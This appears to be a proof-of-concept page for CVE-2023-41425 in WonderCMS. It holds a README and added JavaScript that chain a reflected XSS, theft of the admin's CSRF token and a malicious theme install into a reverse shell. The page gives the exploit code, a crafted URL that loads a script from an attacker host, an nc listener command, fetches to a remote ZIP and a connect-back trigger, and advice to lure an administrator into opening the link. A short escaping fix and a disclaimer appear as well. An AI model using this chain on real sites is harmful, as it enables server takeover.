POC details: 3eeea610c7a7857f77038aa810efd9e60999f858

Source
Related vulnerability
Title: WonderCMS security vulnerability (CVE-2023-41425)
Description: WonderCMS is an open-source content management system (CMS) written in PHP. WonderCMS versions 3.2.0 through 3.4.2 contain a security vulnerability that lets an attacker execute arbitrary code via a crafted script uploaded through the installModule component.
Introduction
# WonderCMS Exploit for CVE-2023-41425

## Description
This script exploits a Cross-Site Scripting (XSS) vulnerability in WonderCMS to deliver a reverse shell to the attacker's machine. It works by leveraging the XSS to inject malicious JavaScript into a logged-in administrator's browser, steal the CSRF token, and install a theme that contains a reverse shell. The attacker does not need admin credentials: the injected script runs with the administrator's session once the administrator opens the crafted link.

## How It Works
1. The attacker serves the `exploit.js` file via a web server (e.g., Python's `http.server`).
2. The attacker crafts a malicious URL that injects this script into the target site.
3. Once it runs in the administrator's browser, the script:
   - Steals the CSRF token from the page.
   - Uses the administrator's session to install a theme containing a reverse shell on the victim's server.
   - Requests the uploaded shell so that it connects back to the attacker's machine.
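
The chain above, as an added example (this is not the repository's `exploit.js`, which the README does not reproduce): the token is read out of the admin's page, then two requests are built, one to `installModule` and one to the unpacked shell. The `directoryName`/`type` parameter names, the hidden-input markup the token is read from, and the `rev.php?lhost=&lport=` path inside the ZIP are assumptions for illustration, not details taken from this page; the constants mirror the ones the README tells you to edit. The URL builders run in Node, and `runExploit` only does anything inside a browser.

```javascript
// Added example (not the repository's exploit.js): the browser-side chain the
// README describes, written so the URL-building parts can be run and checked
// in Node without a target. Parameter names of the installModule endpoint and
// the path of the unpacked reverse-shell script are ASSUMPTIONS about the
// hosted rev.zip, not facts taken from the page.

const CMS_URL = "http://victim.abc/cms";             // assumed target root
const ATTACKER_IP = "10.10.14.123";                  // assumed attacker host
const ATTACKER_LISTENER_PORT = 4444;                 // assumed nc port
const REV_SHELL_URL = "http://10.10.14.123/rev.zip"; // assumed hosted ZIP
const THEME_DIR = "revshell";                        // assumed directory inside rev.zip

// The injected script runs in the admin's origin, so it can read the CSRF
// token straight out of the DOM. Matching a hidden <input name="token"> is an
// assumption about the markup.
function extractCsrfToken(html) {
  const m = html.match(/name=["']token["'][^>]*value=["']([^"']+)["']/i)
         || html.match(/value=["']([^"']+)["'][^>]*name=["']token["']/i);
  return m ? m[1] : null;
}

// Step 1 of the chain: ask installModule to fetch and unpack the ZIP as a theme.
function buildInstallModuleUrl(cmsUrl, revShellUrl, token) {
  const q = new URLSearchParams({
    installModule: revShellUrl,   // remote ZIP the server will download
    directoryName: THEME_DIR,     // assumed parameter name
    type: "themes",               // assumed parameter name
    token: token,                 // admin's CSRF token, read from the DOM
  });
  return `${cmsUrl}/?${q.toString()}`;
}

// Step 2: request the unpacked PHP file so it connects back to the listener.
function buildRevShellTriggerUrl(cmsUrl, ip, port) {
  const q = new URLSearchParams({ lhost: ip, lport: String(port) });
  return `${cmsUrl}/themes/${THEME_DIR}/rev.php?${q.toString()}`;
}

// Runs only inside a browser (the victim admin's session); in Node it is a no-op.
async function runExploit() {
  if (typeof document === "undefined" || typeof fetch === "undefined") return false;
  const token = extractCsrfToken(document.documentElement.outerHTML);
  if (!token) return false;
  // credentials: "include" keeps the admin's session cookie on the request
  await fetch(buildInstallModuleUrl(CMS_URL, REV_SHELL_URL, token), { credentials: "include" });
  await fetch(buildRevShellTriggerUrl(CMS_URL, ATTACKER_IP, ATTACKER_LISTENER_PORT));
  return true;
}

runExploit();
```

The two fetches are same-origin from the admin's point of view, which is why the CSRF token alone is the only thing standing between the XSS and a theme install; reading it from the DOM removes that barrier.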

## Prerequisites
- A web server to host `exploit.js`.
- A listener for the reverse shell (e.g., `nc -lvnp <port>`).
- A ZIP file containing a PHP reverse shell, hosted at a URL the victim server can reach (e.g., `rev.zip`; this is what `REV_SHELL_URL` points to).
- A logged-in WonderCMS administrator who opens the malicious link (e.g., via social engineering).

## Usage
1. **Configure the script:**
   Edit the constants in `exploit.js`:
   - `CMS_URL`: Base URL of the target (e.g., `http://victim.abc/cms`).
   - `ATTACKER_IP`: Your machine's IP address (e.g., `10.10.14.123`).
   - `ATTACKER_LISTENER_PORT`: The port you're listening on (e.g., `4444`).
   - `REV_SHELL_URL`: The URL hosting your reverse shell ZIP file (e.g., `http://10.10.14.123/rev.zip`).

2. **Host the script:**
   Start a web server in the directory containing `exploit.js`:
   ```
   python3 -m http.server 8000
   ```

3. **Craft the exploit URL:** 
    Replace `<ATTACKER_IP>` and `<PORT>` in the following template with the address and port of the web server hosting `exploit.js` (8000 in the previous step; this is not the reverse shell listener port). Fill in `<WONDER_CMS_ROOT_URL>` with the host and path of the WonderCMS installation on the victim website (the template already supplies the `http://` scheme). To find it, look for the login URL; the root URL is one directory above it, e.g. for `http://victim.abc/wondercms/loginURL/` the root URL is `http://victim.abc/wondercms/`. The backslashes before the double quotes are shell escapes; if you paste the URL anywhere other than a shell, drop them.
    ```
    http://<WONDER_CMS_ROOT_URL>/index.php?page=loginURL?\"></form><script+src=\"http://<ATTACKER_IP>:<PORT>/exploit.js\"></script><form+action=\"
    ```

4. **Start the listener:** 
    On your machine, before sharing the link, run:
    ```
    nc -lvnp <ATTACKER_LISTENER_PORT>
    ```

5. **Execute the attack:** 
    Share the malicious URL with the target administrator. Once the administrator opens it while logged in, the reverse shell is delivered and connects back to your listener.
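
Why the URL in step 3 works, as an added example built around a simplified stand-in template (this is not WonderCMS's own code): the `page` value is echoed into a form's `action` attribute unescaped, so the payload closes the attribute and the form, injects a `<script src=...>`, and reopens a form so the remaining markup still parses. The hardened renderer beside it shows the attribute-escaping fix. The host, port and paths are the README's placeholders filled with example values.

```javascript
// Added example, not WonderCMS's own code: a simplified stand-in for the
// reflection behind the crafted URL in step 3, plus the escaped variant.

const ATTACKER_HOST = "10.10.14.123:8000"; // assumed host:port of `python3 -m http.server 8000`

// Value of the `page` parameter exactly as the README template shapes it.
// The README's backslashes are shell escapes and are not part of the payload.
function buildPayload(attackerHost) {
  return `loginURL?"></form><script src="http://${attackerHost}/exploit.js"></script><form action="`;
}

// Full URL as it would be shared; spaces become `+` as in the README template
// (the server decodes them back to spaces before reflecting the value).
function buildExploitUrl(rootUrl, attackerHost) {
  return `${rootUrl}/index.php?page=${buildPayload(attackerHost).replace(/ /g, "+")}`;
}

// Stand-in for the vulnerable template: interpolates the raw value into an attribute.
function renderVulnerable(page) {
  return `<form action="/index.php?page=${page}" method="post"><input name="password"></form>`;
}

// Hardened variant: escape before placing the value inside an attribute
// (equivalent to PHP's htmlspecialchars($page, ENT_QUOTES)).
function escapeHtml(s) {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;")
          .replace(/"/g, "&quot;").replace(/'/g, "&#039;");
}
function renderHardened(page) {
  return `<form action="/index.php?page=${escapeHtml(page)}" method="post"><input name="password"></form>`;
}

// True when the value escaped the attribute and became a real <script> element.
function hasInjectedScript(html) {
  return /<script\s+src=/i.test(html);
}

// Demonstration on the example values.
const exampleUrl = buildExploitUrl("http://victim.abc/wondercms", ATTACKER_HOST);
const vulnerable = renderVulnerable(buildPayload(ATTACKER_HOST));
const hardened = renderHardened(buildPayload(ATTACKER_HOST));
```

With the raw interpolation the browser sees `<form action="/index.php?page=loginURL?"></form><script src="http://10.10.14.123:8000/exploit.js">...`; with escaping, the same value is just a long string inside the attribute and no script element is created.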

## Disclaimer
This code is intended for educational purposes only. Do not use it on systems you do not own or have explicit permission to test. Unauthorized exploitation of vulnerabilities is illegal and unethical.

## References
This is based on https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413 by https://github.com/prodigiousMind, with a few tweaks and fixes that hopefully make it more intuitive to use.

## License
MIT License
File snapshot

[4.0K] /data/pocs/3eeea610c7a7857f77038aa810efd9e60999f858
├── [2.3K] exploit.js
├── [1.0K] LICENSE
├── [2.6K] main.zip
└── [2.8K] README.md

0 directories, 4 files